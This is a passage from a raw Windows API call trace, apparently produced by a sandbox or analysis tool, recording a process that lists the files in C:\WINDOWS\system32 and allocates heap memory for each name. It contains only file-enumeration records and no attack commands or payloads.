lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7768b8e9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7768b8e9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7768b8e9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0102.893] lstrlenW (lpString="fms.dll.mui") returned 11 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502daeb4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x502daeb4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x502daeb4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0102.893] lstrlenW (lpString="mlang.dll.mui") returned 13 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a255aac, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6a255aac, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6a255aac, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x16200, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0102.893] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d69c942, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x9e26238d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xaf366500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="quickassist.exe.mui", cAlternateFileName="")) returned 1 [0102.893] lstrlenW (lpString="quickassist.exe.mui") returned 19 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59984c1b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x59984c1b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x59984c1b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="windows.ui.xaml.dll.mui", cAlternateFileName="")) returned 1 [0102.893] lstrlenW (lpString="windows.ui.xaml.dll.mui") returned 23 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59984c1b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x59984c1b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x59984c1b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="windows.ui.xaml.dll.mui", cAlternateFileName="")) returned 0 [0102.893] FindClose (in: hFindFile=0x70a318 | out: hFindFile=0x70a318) returned 1 [0102.894] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73ab50 | out: hHeap=0x6f0000) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7455dfd7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7455dfd7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7455dfd7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bidispl.dll", cAlternateFileName="")) returned 1 [0102.894] lstrlenW (lpString="bidispl.dll") returned 11 [0102.894] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730d60 [0102.894] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0696d7, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x7e0696d7, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x7e0b5b98, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x574e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BingMaps.dll", cAlternateFileName="")) returned 1 [0102.894] lstrlenW (lpString="BingMaps.dll") returned 12 [0102.895] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7390b8 [0102.895] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72f75e90, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72f75e90, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72f75e90, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BingOnlineServices.dll", cAlternateFileName="")) returned 1 [0102.895] lstrlenW (lpString="BingOnlineServices.dll") returned 22 [0102.895] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xae) returned 0x73ab50 [0102.895] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb4d569, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb4d569, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb4d569, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BioCredProv.dll", cAlternateFileName="")) returned 1 [0102.895] lstrlenW (lpString="BioCredProv.dll") returned 15 [0102.895] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x738cc8 [0102.895] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x742fb963, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x742fb963, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x742fb963, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLockerCsp.dll", cAlternateFileName="")) returned 1 [0102.895] lstrlenW (lpString="BitLockerCsp.dll") returned 16 [0102.895] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72da88 [0102.895] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7081e417, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7081e417, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7081e417, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2aa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0102.895] lstrlenW (lpString="bitsadmin.exe") returned 13 [0102.895] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x739f28 [0102.895] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707d1f49, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x707d1f49, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x707d1f49, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsperf.dll", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="bitsperf.dll") returned 12 [0102.896] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7392b0 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb4d569, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb4d569, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb4d569, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsProxy.dll", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="BitsProxy.dll") returned 13 [0102.896] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x739160 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d39a87, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72d39a87, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72d39a87, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3cad8, dwReserved0=0x0, dwReserved1=0x0, cFileName="biwinrt.dll", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="biwinrt.dll") returned 11 [0102.896] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x731620 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f18ba7f, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x6f18ba7f, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x6f18ba7f, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x22200, dwReserved0=0x0, dwReserved1=0x0, cFileName="BluetoothApis.dll", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="BluetoothApis.dll") returned 17 [0102.896] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa4) returned 0x72dbe8 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c213a95, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6c213a95, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6c213a95, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="boot.sdi") returned 8 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709759b8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x709759b8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x709759b8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="bootcfg.exe") returned 11 [0102.896] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730b80 [0102.896] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e112e71, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e112e71, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e112e71, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTVID.DLL", cAlternateFileName="")) returned 1 [0102.896] lstrlenW (lpString="BOOTVID.DLL") returned 11 [0102.897] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730c20 [0102.897] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753d28f0, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x753d28f0, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x753d28f0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x59c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bopomofo.uce", cAlternateFileName="")) returned 1 [0102.897] lstrlenW (lpString="bopomofo.uce") returned 12 [0102.897] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30616202, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x30616202, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x30616202, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x0, dwReserved1=0x0, cFileName="browcli.dll", cAlternateFileName="")) returned 1 [0102.897] lstrlenW (lpString="browcli.dll") returned 11 [0102.897] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730cc0 [0102.897] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753ac689, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x753ac689, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x753ac689, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BrowserSettingSync.dll", cAlternateFileName="")) returned 1 [0102.897] lstrlenW (lpString="BrowserSettingSync.dll") returned 22 [0102.897] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xae) returned 0x73ac08 [0102.897] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76188612, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x76188612, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x76188612, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="browseui.dll", cAlternateFileName="")) returned 1 [0102.897] lstrlenW (lpString="browseui.dll") returned 12 [0102.897] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x739b38 [0102.897] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc6981, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bthprops", cAlternateFileName="")) returned 1 [0102.897] lstrlenW (lpString="Bthprops") returned 8 [0102.897] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x73acc0 [0102.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\Bthprops\\*", lpFindFileData=0x73acc0 | out: lpFindFileData=0x73acc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc6981, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a2d8 [0102.898] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x73acc0 | out: lpFindFileData=0x73acc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc6981, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.898] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x73acc0 | out: lpFindFileData=0x73acc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7639e7af, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7639e7af, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7639e7af, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="@BthpropsNotificationLogo.png", cAlternateFileName="")) returned 1 [0102.898] lstrlenW (lpString="@BthpropsNotificationLogo.png") returned 29 [0102.898] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x73acc0 | out: lpFindFileData=0x73acc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7639e7af, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7639e7af, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7639e7af, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="@BthpropsNotificationLogo.png", cAlternateFileName="")) returned 0 [0102.898] FindClose (in: hFindFile=0x70a2d8 | out: hFindFile=0x70a2d8) returned 1 [0102.898] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73acc0 | out: hHeap=0x6f0000) returned 1 [0102.898] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7639e7af, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7639e7af, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7639e7af, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x35e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthprops.cpl", cAlternateFileName="")) returned 1 [0102.898] lstrlenW (lpString="bthprops.cpl") returned 12 [0102.898] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd17248, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fd17248, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fd17248, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BthTelemetry.dll", cAlternateFileName="")) returned 1 [0102.898] lstrlenW (lpString="BthTelemetry.dll") returned 16 [0102.898] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72e008 [0102.899] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c344dca, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6c344dca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6c344dca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0102.899] lstrlenW (lpString="bthudtask.exe") returned 13 [0102.899] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x739358 [0102.899] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eea2923, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6eea2923, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6eea2923, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xfc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="btpanui.dll", cAlternateFileName="")) returned 1 [0102.899] lstrlenW (lpString="btpanui.dll") returned 11 [0102.899] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x731440 [0102.899] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753ac689, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x753ac689, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x753ac689, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWContextHandler.dll", cAlternateFileName="")) returned 1 [0102.899] lstrlenW (lpString="BWContextHandler.dll") returned 20 [0102.899] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x73acc0 [0102.899] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9a9afa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6f9a9afa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6f9a9afa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ByteCodeGenerator.exe", cAlternateFileName="")) returned 1 [0102.899] lstrlenW (lpString="ByteCodeGenerator.exe") returned 21 [0102.899] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xac) returned 0x73ad78 [0102.899] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fca4b16, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fca4b16, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fca4b16, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabapi.dll", cAlternateFileName="")) returned 1 [0102.899] lstrlenW (lpString="cabapi.dll") returned 10 [0102.900] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x7314e0 [0102.900] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fccad72, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fccad72, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fccad72, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d058, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabinet.dll", cAlternateFileName="")) returned 1 [0102.900] lstrlenW (lpString="cabinet.dll") returned 11 [0102.900] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x7309a0 [0102.900] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761623aa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x761623aa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x761623aa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabview.dll", cAlternateFileName="")) returned 1 [0102.901] lstrlenW (lpString="cabview.dll") returned 11 [0102.901] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730ae0 [0102.901] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b58f0b5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b58f0b5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b58f0b5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0102.901] lstrlenW (lpString="cacls.exe") returned 9 [0102.901] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x73b860 [0102.901] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762936dc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x762936dc, 